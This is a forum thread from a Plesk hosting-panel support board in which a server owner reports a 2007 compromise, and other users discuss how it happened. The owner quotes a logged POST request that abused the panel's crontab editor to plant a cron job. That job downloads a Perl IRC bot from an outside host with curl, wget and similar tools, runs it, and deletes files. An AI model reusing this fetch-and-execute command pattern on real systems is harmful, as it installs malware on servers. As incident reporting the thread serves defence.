• Introducing WebPros Cloud - a fully managed infrastructure platform purpose-built to simplify the deployment of WebPros products !  WebPros Cloud enables you to easily deliver WebPros solutions — without the complexity of managing the infrastructure.
    Join the pilot program today!
  • Support for BIND DNS has been removed from Plesk for Windows due to security and maintenance risks.
    If a Plesk for Windows server is still using BIND, the upgrade to Plesk Obsidian 18.0.70 will be unavailable until the administrator switches the DNS server to Microsoft DNS.

Security Violation plesk 8.0.X

S

stewartrose

Guest
Just for interest..

Hacked through Plesk control panel.

httpsd_access_log:xxx.xxx.xxx.xxx - - [26/May/2007:00:00:24 +0100] "POST /sysuser/crontab_edit.php?cmd=update&cte_enabled=true&cte_minute=*&cte_hour=*&cte_dom=*&cte_month=*&cte_dow=*&cte_cmd=cd%20/usr/local/lib/;killall%20-9%20perl;rm%20-rf%20flaviu;curl%20-O%20http://flaviu.ro/flaviu;wget%20http://flaviu.ro/flaviu;lynx%20-source%20http://flaviu.ro/flaviu;fetch%20www.flaviu.ro/flaviu;GET%20http://flaviu.ro/flaviu;perl%20flaviu;rm%20-rf%20x* HTTP/1.1" 200 366

All the best from Alan
 
Thats a risk you take whenever you allow a user to modify cron. They can execute any command on the system that they want.

What happened there is that someone with a valid logon set up a cron job to download that script (an irc zombie bot) and run it.
 
Hi atomicturtle,

Not quite, no one has access to the cp but me, and my passwords are very strong, the code given uploads data through the exploit..

all the best from Alan
 
Then its possible your desktop has been compromised. You cannot access the cron settings without being logged into the CP.
 
You must log in or register to reply here.

Similar threads

T
Upgrade Phpbb Now!!! 2.0.15
Replies
1
Views
3K
Outlaw
O
Back
Top